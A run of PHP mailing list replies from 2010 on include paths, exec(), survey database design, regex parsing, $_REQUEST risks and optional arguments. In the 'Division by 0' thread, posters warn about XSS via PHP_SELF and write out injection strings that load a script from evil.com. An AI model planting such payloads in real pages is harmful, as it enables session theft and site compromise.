Re: [PHP] Will PHP ever grow up and have threading?
Op 3/24/10 10:40 AM, Rene Veerman schreef: I subscribe to this list to share tips on software designs. Getting and keeping your respect i'm not even interested in. I'm interested in the quality of your tips on problems i post, as tips can lead faster to products, leads to money, leads to my personal freedom and options in life. Respect cannot be used to buy bread and butter. Someone who respects you will buy you a sandwich if you need it. But seemingly you're only interested in leveraging other peoples time and experience to further your own career, good luck with that around here. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Fwd: Re: [PHP] another question on setting include paths for a project
oops, mailed the OP direct rather than the list. sorry. Originele bericht Onderwerp: Re: [PHP] another question on setting include paths for a project Datum: Mon, 22 Mar 2010 15:58:28 + Van: Jochem Maas joc...@iamjochem.com Aan: Robert P. J. Day rpj...@crashcourse.ca Op 3/22/10 2:18 PM, Robert P. J. Day schreef: to recap regarding an earlier question i asked regarding extending include paths, i have an existing project (call it proj currently all under a top-level directory also named proj) which can be SVN checked out anywhere under a user's home directory. so in my case, i might have my svn working copy under, say, /home/rpjday/stuff/work/proj/, and all proj-related content under that. at the moment, there are some subdirs under proj/ like common and utils and debug, and all includes or requires throughout the working copy are currently and awkwardly of the form: include '../../proj/utils/somescript.php'; in short, every script that needs to include another one somewhere else in the code structure sadly needs to know its precise relative location. my proposal is to get rid of most of that by: 1) having developers set a single env var PROJ_DIR in their login session, reflecting wherever the heck they checked out their working copy to, then ... 2) having said developers uniformly extend their directly callable PHP scripts with something at the very top like: set_include_path(getenv('PROJ_DIR') . PATH_SEPARATOR . get_include_path()); not only will that let them simplify their command-line callable scripts to say just: include 'utils/somescript.php'; also, as i read it, that newly-extended include path percolates down through all PHP scripts invoked directly or indirectly from this one, right? so while i could add that set_include_path() to every single PHP script everywhere in the code base, it's really only necessary to add it to those PHP scripts that people intend to *invoke* directly -- every other script will pick it up automatically as it's called, is that correct? (did i phrase that meaningfully?) that was part one. the new additional complication is that some of those PHP scripts will manually construct HTTP POST requests and ship those requests off to PHP scripts that live under a public_html/ directory, whose scripts might *also* want to include some of those very same utils/ or common/ scripts but that modified include path will, of course, not carry across a POST request, so what's the standard way to similarly modify the include path of the scripts on the server end? (unsurprisingly, all those server-side PHP scripts are also part of the entire SVN checkout just so i can keep everything in the same place for testing.) so how can i have those server-side scripts extend their search path based on, perhaps, the same environment variable? thoughts? I think the whole 'set an ENV var in their shell session' idea is overkill. everything is checked out from svn, the structure of the project is known, there is no reason not to use relative paths for the includes, there is no need to tell the scripts where stuff is in this scenario - they can work it out automatically. the following might give you an idea for a bit of bootstrap code that's included by everything: define('INC_DIR', dirname(__FILE__)); this would allow all other code to use absolute paths and allow you to set the include_path to ''. how do the cmdline scripts know which URL to hit ... I would assume that this URL can change depending on whose checkout it is and the context (dev/prod), that means there is already a config file or some such - possibly a good place to stick the include path or define the include dir. ... and now for something 'completey' different: another trick I've used is to use custom ini settings in conjunction with get_cfg_var() - each developer/installation would have their own custom ini file (which you can store in svn too) .. the ini file would be symlinked to from the dir php is setup to read additional ini files from, the contents of the ini file would be something like: [My Cool App] my_cool_app.public_url = 'http://local.coolapp/'; my_cool_app.inc_dir = '/path/to/cool/app/'; you can then grab these values from anywhere using get_cfg_var('my_cool_app.inc_dir'), often I find that additional config stuff is needed per installation - mostly related to webserver setup (which sometimes differs somewhat between live and dev installs - SSL may not be available/required/wanted and if it is IP addresses need to be hard coded, apache may require you to use absolute paths, test systems may require IP restrictions, etc) so I setup a dir structure like so: project/cnf/targets/localhost.jochem/php project/cnf/targets/localhost.jochem/httpd project/cnf/targets/localhost.charlie/php project/cnf/targets/localhost.charlie/httpd
Re: [PHP] PHP to access shell script to print barcodes
Op 3/23/10 3:27 AM, Rob Gould schreef: I am trying to replicate the functionality that I see on this site: http://blog.maniac.nl/webbased-pdf-lto-barcode-generator/ Notice after you hit SUBMIT QUERY, you get a PDF file with a page of barcodes. That's _exactly_ what I'm after. Fortunately, the author gives step-by-step instructions on how to do this on this page: http://blog.maniac.nl/2008/05/28/creating-lto-barcodes/ So I've gotten through all the steps, and have created the barcode_with_samples.ps file, and have it hosted here: http://www.winecarepro.com/kiosk/fast/shell/ Notice how the last few lines contain the shell-script that renders the postscript: #!/bin/bash BASE=”100″; NR=$BASE for hor in 30 220 410 do ver=740 while [ $ver -ge 40 ]; do printf -v FNR “(%06dL3)” $NR echo “$hor $ver moveto $FNR (includetext height=0.55) code39 barcode” let ver=$ver-70 let NR=NR+1 done done I need to somehow create a PHP script that executes this shell script. And after doing some research, it sounds like I need to use the PHP exec command, so I do that with the following file: http://www.winecarepro.com/kiosk/fast/shell/printbarcodes.php Which has the following script: ?php $command=http://www.winecarepro.com/kiosk/fast/shell/barcode_with_sample.ps;; exec($command, $arr); echo $arr; ? And, as you can see, nothing works. I guess firstly, I'd like to know: A) Is this PHP exec call really the way to go with executing this shell script? Is there a better way? It seems to me like it's not really executing. that's what exec() is for. $command need to contain a *local* path to the command in question, currently your trying to pass a url to bash ... which obviously doesn't do much. the shell script in question needs to have the executable bit set in order to run (either that or change to command to run bash with your script as an argument) I'd also suggest putting the shell script outside of your webroot, or at least in a directory that's not accessable from the web. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Event/Exhibition Organizers Management Software
hi gang[tm], I've been STFW for some kind of CRM package specifically geared at event/exhibition organizers. I'm not having any luck, there *seems* to be stuff out there but most of it's geared at single exhibitor/corporate entity event management as opposed to the organization of events where 100s of exhibitors need be approached, sold stand space to and manage - of those that do seem to what I'd like they are a bit vague on their website and don't give any pricing info (as usual price is a big issue :). I've looked at the possibilities of using Salesforce or SugarCRM but neither seem to have plugins/modules aimed at the specific requirements I have. Basically I want something to manage: 1. multiple expos/exhibitions 2. selling standspace 3. manage tickets/ticket campaigns 4. floorplan management/creation/etc 5. speaker/debate-panel management 6. exhibitor pack/documentation management 5. the usual invoicing/lead/crm stuff does anyone know of anything that comes remotely close? rgds, Jochem -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: PHP in HTML code
Op 3/13/10 3:49 PM, Jorge Gomes schreef: First of all, i recommend the use of normal php tags (?php ... ?) because the short tags are atm marked as* **DEPRECATED*. that's a documentation error. You should also echo your values to the page, instead using the shortcut ?= (stop being a lazy ass! :P): it's not lazy, it's succinct and much easier to read (once you know what it means), but ... if you require portable code and your liable to be running on shared hosting where you don't control the ini settings you might consider not using it. it is often feasable to turn them on explicitly in your 'init' routine so that your template/output code can use short tags: ?php ini_set('short_open_tag', true); ? I can't recall that this is ever locked down on a server so that you can't change it, although the default if quite often set to FALSE. tr td align=left?php echo $_SESSION['scripture_text']; ?/td /tr input type=text name=reservation_date value=?php echo $_GET['rdate']; ? readonly= remember that between tags, we have normal php code. Rewards how much? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] I need a fresh look at storing variables in MySQL
Op 3/14/10 11:45 AM, Ashley Sheridan schreef: On Sun, 2010-03-14 at 12:25 +0100, Rene Veerman wrote: On Sun, Mar 14, 2010 at 12:24 PM, Rene Veerman rene7...@gmail.com wrote: I'd love to have a copy of whatever function you use to filter out bad HTML/js/flash for use cases where users are allowed to enter html. I'm aware of strip_tags() allowed tags param, but haven't got a good list for it. oh, and even img tags can be used for cookie-stuffing on many browsers.. Yes, and you call strip_tags() before the data goes to the browser for display, not before it gets inserted into the database. Essentially, you need to keep as much original information as possible. I disagree with both you. I'm like that :) let's assume we're not talking about data that is allowed to contain HTML, in such cases I would do a strip_tags() on the incoming data then compare the output ofstrip_tags() to the original input ... if they don't match then I would log the problem and refuse to input the data at all. using strip_tags() on a piece of data everytime you output it if you know that it shouldn't contain any in the first is a waste of resources ... this does assume that you can trust the data source ... which in the case of a database that you control should be the case. at any rate, strip_tags() doesn't belong in an 'anti-sql-injection' routine as it has nothing to do with sql injection at all. Thanks, Ash http://www.ashleysheridan.co.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Splitting a string ...
Op 3/15/10 1:54 AM, Ashley M. Kirchner schreef: I'm not a regexp person (wish I was though), and I'm hoping someone can give me a hand here. Consider the following strings: - domain\usern...@example.org - domain\username - the same as above but with / instead of \ (hey, it happens) - usern...@example.org - username Essentially I have a sign-up form where folks will be typing in their username. The problem is, in our organization, when you tell someone to enter their username, it could end up being any of the above examples because they're used to a domain log in procedure where in some cases they type the whole thing, in other cases just the e-mail, or sometimes just the username. So what I'd like is a way to capture just the 'username' part, regardless of what other pieces they put in. In the past I would write a rather inefficient split() routine and eventually get what I need. With split() getting deprecated, I figured I may as well start looking into how to do it properly. There's preg_split(), str_split(), explode() . possibly others. So, what's the proper way to do this? How can I capture just the part I need, regardless of how they typed it in? ?php $inputs = array( // double slashes just due to escaping in literal strings domain\\usern...@example.org, domain\\username, domain/usern...@example.org, domain/username, usern...@example.org, username, ); foreach ($inputs as $input) { // four slashes = two slashes in the actual regexp! preg_match(#^(?:.*[/])?([...@]*)(?:@.*)?$#, $input, $match); var_dump($match[1]); } ? ... just off the top of my head, probably could be done better than this. I would recommend reverse engineering the given regexp to find out what it's doing exactly ... painstaking but worth it to go through it char by char, it might be the start of a glorious regexp career :) Thanks! A -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] I need a fresh look at storing variables in MySQL
Hi Tedd, just a few thoughts that might help ... Op 3/13/10 6:10 PM, tedd schreef: Hi gang: I just completed writing a survey that has approximately 180 questions in it and I need a fresh look at how to store the results so I can use them later. first off - wasn't there a cut'n'dried piece of survey software out there that did the job? don't know off hand what the 'market' currently offers but I'm pretty sure there are a number of candidate php-based wotsits. as such they might be worth looking at just to check out their data models. The survey requires the responder to identify themselves via an authorization script. After which, the responder is permitted to take the survey. Everything works as the client wants so there are no problems there. My question is how to store the results? I have the answers stored in a session variable, like: $_SESSION['answer']['e1'] $_SESSION['answer']['e2'] $_SESSION['answer']['e2a'] $_SESSION['answer']['e2ai'] $_SESSION['answer']['p1'] $_SESSION['answer']['p1a'] $_SESSION['answer']['p1ai'] and so on. As I said, there are around 180 questions/answers. Most of the answers are integers (less than 100), some are text, and some will be null. Each vote will have a unique number (i.e., time) assigned to it as well as a common survey id. what happens when 2 people vote at the same time? My first thought was to simply record the vote as a single record with the answers as a long string (maybe MEDIUMTEXT), such as: 1, 1268501271, e1, 1, e2, 16, e2a, Four score and ..., e2a1, , that would make life very difficult if you wanted to use the Then I thought I might make the data xml, such as: survey_id1/survey_idvote_id1268501271/vote_ide11/e1e216/e2e2aFour score and .../e2ae2ai/e2ai doesn't seem like XML is the answer at all. isn't it Larry Garfield with the sig line that says: Sometime a programmer has a problem and thinks I know I'll use XML, now he has 2 problems. :) That way I can strip text entries for and have absolute control over question separation. Then I thought I could make each question/answer combination have it's own record while using the vote_id to tie the vote together. That way I can use MySQL to do the heavy lifting during the analysis. While each vote creates 180 records, I like this way best. is there only ever going to be one survey of which the questions/structure is now fixed/definitive? if so I'd probably opt for the simple approach of a table with 180 columns purely because that would make for the easiest reporting queries (no self-referencing joins needed to answer the question posed below ... which would be the case if you normalized the data to one row per question+answer+vote[r]) ... although possibly not speediest in terms of SQL performance (you'd have to be careful with creating lots of indexes because that would affect insert performance) basically one table with 180 answer columns and an addition primary [voter?] key, possibly also a survey id if your going to be repeating the survey over time. a more normalized approach would be to define all the questions and their answer types in one table, surveys in another, with answers per qestion in another: survey table: id INT (PK) nameVARCHAR dateTIMESTAMP questions table: id INT (PK) positionINT - order of questions survey_id INT questionVARCHAR/TEXT question_type ENUM? voters table: id INT (PK) nameVARCHAR ?? answers tables: id INT (PK) voter_idINT question_id INT answer ? with the answer values in the answers table you might consider a field for each question_type you define so that you can use a proper data type - this would be somewhat denormalized because you'd only ever use one of those fields per row but it might come in handy. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
Op 3/10/10 11:39 PM, Daniel Egeberg schreef: On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban dmi...@ruban.biz wrote: Hi Jochem, Jochem Maas wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way. Regards, Dmitry No, it is not safe... This won't work: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script But this will: index.php/ onsubmit=evil()script src=http://www.evil.com/evi.js;/script yeah sorry, I was lax and made the query string mistake, the issue stands though as Daniel pointed out. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
Op 3/11/10 2:44 PM, Mike Roberts schreef: I have tried and tried, countless times to be removed from this list... still when I go to my deleted items I can see that emails leak through. If there is an administrator who can simply delete me ( simply because I can not seem to do this correctly) I would greatly appreciate it. Thank You! no there is not (really!), either search the archives, search php.net look at the bottom of any of the email sent via the list or check the email headers of email sent via the list - any one of those will give you a way out. but that probably is a bit of a technical challenge, so try this: send a blank email to php-general-unsubscr...@lists.php.net using the email account you are subscribed to the list to. all things being equal you should recieve a message saying either that you've been removed or that you need to confirm the removal (which means either replying once more to that message or clicking a link). PS - it's generally considered bad form to reply to someone else's thread rather than send a new message when you're not engaging the current conversation. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP backup in Minnesota
Op 3/11/10 10:05 PM, Ken Kixmoeller schreef: Hey, folks --- - -- Session-based, no cookies. sessions are cookie based. unless your passing the session id around via a URL parameter, which is a no-no. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script with regard to the original problem - some input validation is in order. (pow($intCalc,$totalPayments) - 1); if $intCal and $totalPayments are both equal to 1 then either something is wrong and the calc shouldn't be done or some other calc needs to be done. every value being POSTed should be checked that it's been set, and that it's a valid numeric value (for the numeric fields) ... if anything is missing show the form again and display an error message without doing the calculation. and you should be good to go. Joseph Gary wrote: I have a mortgage amortization script that was working fine,now it seems to have gone awry. Below is the entire script plus input page. I am getting an error Warning: Division by zero in /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on line 47 Which is (pow($intCalc,$totalPayments) - 1); Frankly I am not even sure the information is being passed to the script. Anyone see what I am missing? Gary div id=onecolCalculate your Loan/div div id=leftcontent form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form table tr td style=background-color:#B1D8D8 width=110pxLoan Amount/td tdinput name=loan_amount type=text size=25 / USD/td tda href=javascript:void(0); onmouseover=Tip('This is the amount of money to be loaned.') onmouseout=UnTip()img src=images/help.png class=noborder//a/td /tr tr td style=background-color:#B1D8D8 width=110pxType of Loan/td td select name=type size=1 id=type optionInstallment/option optionBalloon/option /select/td tda href=javascript:void(0); onmouseover=Tip('This is the method of repayment.') onmouseout=UnTip()img src=images/help.png class=noborder//a/td /tr tr td style=background-color:#B1D8D8 width=100pxTerm of Loan/td tdinput name=loan_term type=text size=5 / /selectMonths/td tda href=javascript:void(0); onmouseover=Tip('This is the amount of time that the money is loaned for.') onmouseout=UnTip()img src=images/help.png class=noborder //a/td /tr tr td style=background-color:#B1D8D8 width=140pxInterest Rate/td tdinput name=int_rate type=text size=10 / Per Annum/tdtda href=javascript:void(0); onmouseover=Tip('Percentage (%) charged on loan on an annual basis. br /Please see our FAQs for information on usury rates. br /If no amount is entered this will be 0%.') onmouseout=UnTip()img src=images/help.png class=noborder //a/td /tr /table label input type=submit name=submit id=submit value=submit / /label /form ?php function amortizationTable($paymentNum, $periodicPayment, $balance, $monthlyInterest) { $paymentInterest = round($balance * $monthlyInterest,2); $paymentPrincipal = round($periodicPayment - $paymentInterest,2); $newBalance = round($balance - $paymentPrincipal,2); print tr td$paymentNum/td td\$.number_format($balance,2)./td td\$.number_format($periodicPayment,2)./td td\$.number_format($paymentInterest,2)./td td\$.number_format($paymentPrincipal,2)./td /tr; # If balance not yet zero, recursively call amortizationTable() if ($newBalance 0) { $paymentNum++; amortizationTable($paymentNum, $periodicPayment, $newBalance, $monthlyInterest); } else { exit; } } #end amortizationTable() # Loan balance $balance =($_POST['loan_amount']); # Loan interest rate $interestRate = ($_POST['int_rate']); # Monthly interest rate $monthlyInterest = ($interestRate / 12); # Term length of the loan, in years. $termLength =($_POST['loan_term']); # Number of payments per year. $paymentsPerYear = 12; # Payment iteration $paymentNumber =($_POST['loan_term']); # Perform preliminary calculations $totalPayments = $termLength * $paymentsPerYear; $intCalc = 1 + $interestRate / $paymentsPerYear; $periodicPayment = $balance * pow($intCalc,$totalPayments) * ($intCalc - 1) / (pow($intCalc,$totalPayments) - 1); $periodicPayment = round($periodicPayment,2); # Create table echo table width='50%' align='center' border='1'; print tr thPayment Number/ththBalance/th
Re: [PHP] Execution order of PHP
Op 3/10/10 1:29 PM, Auke van Slooten schreef: Hi, In a hobby project I'm relying on the order in which the following piece of PHP code is executed: $client-system-multiCall( $client-methodOne(), $client-methodTwo() ); Currently PHP always resolves $client-system (and executes the __get on $client) before resolving the arguments to the multiCall() method call. Is this order something that is specified by PHP and so can be relied upon to stay the same in the future or is it just how it currently works. If it cannot be relied upon to stay this way, I will have to rewrite the multiCall method and API... I think you can probably rely on the call order but given no formal spec for php it's not ironclad - multiCall() will never be called before methodOne() or methodTwo() because the return values of those are needed to pass to multiCall() BUT you can't say for sure whether $client-system will be evaluated before the methodOne() and methodTwo() calls ... looking at it the code doesn't actually require it, in practice it doubt the engine will change so dramatically that the call order would change. but who cares. the code is full of magic, which makes it difficult to understand and maintain ... fix it so that it's explicit about what it's doing so that other developers who read it will grasp the concept without having to dig into your magic methods. this solves the problem of undiscernable magic and possible issues with resolution order in the future as well (which if they happened would be a royal PITA to debug, given the magic methods involved) regards, Auke van Slooten Muze -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Want to learn to work with Zend Framework?
Op 3/4/10 9:14 PM, Daniel Brown schreef: On Thu, Mar 4, 2010 at 14:59, mrfroasty mrfroa...@gmail.com wrote: Looks expensive, definately NO Then do not reply. It was an offer to the community at large, not just you and the other top-poster. ;-P quite. and it's not like Zend send such offers to the list everyday, in fact I don't think I've seen anything from them here before at all. this list is not moderated, as such we're liable to receive stuff now and again that we're not personally interested in ... just ignore it. to those that argue it's expensive - quality training is, that's the nature of the business and the subject matter we deal with. to those that argue that it's spam, I would disagree - the 'ad' is directly relevant to php developers, the sender's employer is reputable, the recipients are all members of an unmoderated mailing list that is generally (pun intended) known to be very flexible and lax with regard to the exceptability of posts and lastly the actual sender is a traceable person with a working email address. everything pretty much above board as far as I'm concerned. I would suggest that Zend don't send such 'ad's too often purely because that might offend the very people they are trying to reach, additionally they might consider that when they do send things like this to also include links/etc to relevant/new resource that are freely available ... I'd personally wouldn't mind an occasional email pointing out some new article about, for instance, 'Best Practices' which also includes info about upcoming courses ... a bit of give and take in that vein might garner a more positive response, in general, from members of this list. ... your thoughts on a post card ;-) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Uninstalling PHP?
Op 2/28/10 12:08 AM, Austin Powers schreef: Austin Powers austinpow...@pobox.com wrote in message news:ca.b0.29124.619a8...@pb1.pair.com... Three weeks ago I was working through the Lynda.com PHP with MySQL Training because I wanted to begin using PHP (surprise, surprise). Anyway, on this video course the teacher explains that because installing PHP and MySQL is so well understood on a Mac that we may as well just follow his steps and do it manually. Well, he is installing a different version of PHP and MySQL to the ones that I was able to download and while what he was saying way somewhat similar I am guessing that there is a difference somewhere, and (well) it's not working. I AM A COMPLETE NOVICE WITH LINUX/FREEBSD. It had not been my intention to learn the intricacies of Linux. However, I am now neck deep in a mire of confusion that even MAMP can't seem to sort out for me. It is purely a guess that I need to start again from a complete clean setup (reformatting my hard disk and reinstall OS X again) but that is pretty much out of the question. I guess my question is: How can I completely uninstall PHP so that I can start again? Thanks. I did a: find / -name 'apachectl' 2. /dev/null and it came back with: /usr/sbin/apachectl /Applications/MAMP/Library/bin/apachectl Mac OS X has an install of apache by default, the control script for that is: /usr/sbin/apachectl if your installing MAMP (or a custom setup) you'll want to deactivate the default installation ... go to System Preferences Sharing then turn off Web Sharing if you want to deinstall MAMP there should be a deinstaller program in /Application/MAMP, once you've run that you can just delete that whole directory. then you can try to install again by mounting the MAMP .dmg file and running the installer. so I do: cd /Application/MAMP/Library/bin and then: ./apachectl graceful and it came back with: httpd not running, trying to start (13) permission denied: make_sock: could not bind to address {::]:80 (13 permission denied: make_sock: could not bind to address 0.0.0.0:80 no listening sockets available, shutting down Unable to open logs this is a permissions thing - you need to run the command using sudo (as explained in another post) Does this mean that httpd is not running, and that I need to make some change to the httpd.conf file? If so, then what changes do I need to make? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] $_POST vs $_REQUEST
Op 2/24/10 11:18 AM, Ashley Sheridan schreef: On Wed, 2010-02-24 at 07:55 +, Jochem Maas wrote: Op 2/22/10 10:49 PM, John Black schreef: On 02/22/2010 11:42 PM, Michael Shadle wrote: The difference here is you can at least have some control over the data and expect it in a certain fashion. Also the behavior of cookies vs. get vs. post are different (cookies have length and expiration limits, get has length limits, post has server confgured limits) The cookie and post/get part is all mixed up now :) I use $_COOKIE when I want cookie information but I know that the data is not to be trusted and is easily fabricated. When reading get or post I just use $_REQUEST nowadays because I don't have to care how the submitting form is written. This makes my form handling data more portable. a. if your updating/inserting/storing data for the user you should require POST in order to mitigate CSRF et al - not to mention using a nonce in your forms. b. when you use $_REQUEST like you do you assume it's either GET or POST data, but it might be COOKIE data ... which will overwrite what is sent via GET or POST in the $_REQUEST array .. which creates a potential for a denial-of-service attack on the users of a site: imagine an 'id' parameter for displaying articles, then imagine a user was tricked into loading a cookie onto his machine for your domain with the name of 'id' and a value of 1 ... said user would only ever be able to see the article referred to be id=1 if you wrote code that took the 'id' parameter from the $_REQUEST var. ... I advocate not trusting any data *and* being explicit about the input vectors on which any particular piece of data is accepted in a given context. (GET, POST and COOKIE are 3 different vectors) Which becomes a moot point if you use the request_order ini setting to specify the ordering of the overriding of variables in $_REQUEST. which I think is another bit of magic I can do without. besides you don't always have control of the ini file (and you obviously can't change this value during the running of the script as $_REQUEST is already defined) I do see what you're getting at, and yes there are concerns to be had with one global array overriding another if you don't know to look out for such a caveat. The thing is, there are many times where $_REQUEST is just perfect. Imagine a stylesheet picker, that remembers the visitors choice in a cookie. You can utilise $_REQUEST to handle the whole thing very easily, and in a way that makes sense. which would require a request_order of CPG - the opposite of what it normally is, which is a complete WTF for any new developer of the code base, all so you can save a couple of lines of very simple code. I don't think it's worth it. BUT given that you do know what all the ramification are and can control the request_order in your environment then it's true to say that in your case there is no actual problem. Thanks, Ash http://www.ashleysheridan.co.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] $_POST vs $_REQUEST
Op 2/23/10 10:27 AM, Ashley Sheridan schreef: On Tue, 2010-02-23 at 09:19 +, Richard wrote: Hi, Well people better than me (how is that possible?!) have said that $_REQUEST has the potential to open your app up to security vulnerabilities, and that it should be avoided because of that. Here's a post from Stephan Esser about it on the PHP-Internals list: http://www.mail-archive.com/intern...@lists.php.net/msg32832.html Stephan heads up the Hardened-PHP project and when it comes to security, I don't know of anyone better. So, if he advises not to use _REQUEST, it's a good idea to follow that advice. -- Richard Heyes Well, he's only saying there that it 'most probably vulnerable' and mentions that cookies can overwrite post and get data. This isn't a problem with $_REQUEST itself but rather an applications' use of it. So what if someone crafts a cookie to send a bad value. If someone has the gen to do that, then they are going to know how to send get and post values as well. Only decent sanitisation will be able to protect against this. If the order of override variables in $_REQUEST is such an issue too, use the request_order ini setting to specify the order you'd prefer. I've never had any issues with using $_REQUEST, but found a lot of advantages to using it, as I often use a mix of data sources in the same app. and that is exactly Essers point. you use $_REQUEST and assume the data came from either GET or POST ... I'd hazard a guess your apps never expect such 'mixed' data to be coming via COOKIE ... so your app will work as 'advertised' but if some one happens to slip a cookie onto someone else machine whose name matches some rather important GET/POST input then it's that user who potentially has just suffered a denial of service - and you'll get the blame for the fact things don't work and you'll probably never be able to work out that it's a rogue cookie on the client putting a spanner in the works. (imagine you have an 'id' parameter and I managed to set a cookie on your users' machine called 'id' with a value of 1 ... have fun with that) you should be as strict with exceptable input vectors as you are with sanitisation of the actual input. use of $_REQUEST is rather lazy - if you want to except either POST or GET for a given input write a simple wrapper function for that specific requirement - this will also save you from unforeseen problems related to incorrect or changed values for the request_order ini setting. Thanks, Ash http://www.ashleysheridan.co.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] $_POST vs $_REQUEST
Op 2/22/10 8:39 PM, Slack-Moehrle schreef: Hi All, I have Forms that I submit for processing. I have seen examples of people using either $_POST or $_REQUEST. When would I choose one over the other? use $_POST, $_REQUEST is normally an amalgam of GET, POST and COOKIE - as such using $_REQUEST can open you up to a denial of service attack (if someone manages to place cookies with the same names as your form fields they will always override what was in the POST). avoid using $_REQUEST. Also, I see examples of these being used with and without the single quotes Like: $_POST[j_orderValue] this generates an E_NOTICE and is bad practice, it's also slower, essentially PHP sees the CONSTANT j_orderValue which it can't find and does it's best to accomodate sloppy code by tranlating it into the string 'j_orderValue' try turning up the ini setting 'error_reporting' to include E_NOTICE warnings (and everything else) and see what else your code might be doing which isn't quite right ... it can be very helpful, I'm assuming you're running a local webserver, as running that in production is a bit pointless in my view (additionally having the ini setting 'display_errors' turned on in production is a security issue) or $_POST['j_orderValue'] Single quotes is best, correct to prevent sql injection? this does nothing for SQL injection prevention, for that you need the escaping function for the DB you use ... for MySQL that would be mysql_real_escape_string(). -ML -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] optional object arguments to a function
Op 2/13/10 8:05 AM, Michael A. Peters schreef: I've started working on a class using DOMDocument to assemble MathML in php. The class, assuming I actually succeed, will eventually be used for parsing LaTeX math equations to MathML without the need to have TeX installed. I probably won't be able to support all the possibilities for equations that LaTeX does w/o a TeX install (and definitely not user defined macros) but I suspect I can (hopefully) cover most of the common stuff. One thing I don't know how to do, though, is write a function where arguments are optional object. IE for a function to generate an integral, the limits are optional but if specified must be an object (since they may be an equation themselves). I want the default to be some kind of a null object so I know to do nothing with it if it is null. With string/integer you just do function foo($a='',$b='',$c=false) { } How do I specify a default null object, or otherwise make the argument argument optional? this first one doesn't work: ? class Foo { function dobar(stdObject $o = null) { /* ... */ } } $e = new Foo; $f = new Foo; $f-dobar();// works $f-dobar($e); // catchable fatal $f-dobar((object)array()); // catchable fatal - check the error msg!?!? ? ... but if you're able/willing to specify a user defined class then you have this option: ?php class Bar {} class Foo { function dobar(Bar $o = null) { /* ... */ } } $b = new Bar; $f = new Foo; $f-dobar($b); $f-dobar(); ? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] SQL insert () values (),(),(); how to get auto_increments properly?
Op 2/13/10 10:08 AM, Lester Caine schreef: Rene Veerman wrote: Hi. I'm looking for the most efficient way to insert several records and retrieve the auto_increment values for the inserted rows, while avoiding crippling concurrency problems caused by multiple php threads doing this on the same table at potentially the same time. Any clues are greatly appreciated.. I'm looking for the most sql server independent way to do this. Rene The 'correct' way of doing this is to use a 'sequence' which is something introduced in newer versions of the SQL standard. Firebird(Interbase) has had 'generators' since the early days (20+ years) and these provide a unique number which can then be inserted into the table. ADOdb emulates sequences in MySQL by creating a separate table for the insert value, so you can get the next value and work with it, without any worries. The only 'problem' is in situations were an insert is rolled back, a number is lost, but that is ACTUALLY the correct result, since there is no way of knowing that a previous insert WILL commit when several people are adding records in parallel. this is all true and correct ... but that doesn't answer the problem. how do you get the IDs of all the records that we're actually inserted in a multi-insert statement, even if you generate the IDs beforehand you have to check them to see if any one of the set INSERT VALUEs failed. @Rene: I don't think there is a really simple way of doing this in a RDBMS agnostic way, each RDBMS has it's own implementation - although many are alike ... and MySQL is pretty much the odd one out in that respect. it might require a reevaluation of the problem, to either determine that inserting several records at once is not actually important in terms of performance (this would depend on how critical the speed is to you and exactly how many records you're likely to be inserting in a given run) and whether you can rework the logic to do away with the requirement to get at the id's of the newly inserted records ... possibly by indentifying a unique indentifier in the data that you already have. one way to get round the issue might be to use a generated GUID and have an extra field which you populate with that value for all records inserted with a single query, as such it could function as kind of transaction indentifier which you could use to retrieve the newly inserted id's with one extra query: $sql = SELECT id FROM foo WHERE insert_id = '{$insertGUID}'; ... just an idea. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] SQL insert () values (),(),(); how to get auto_increments properly?
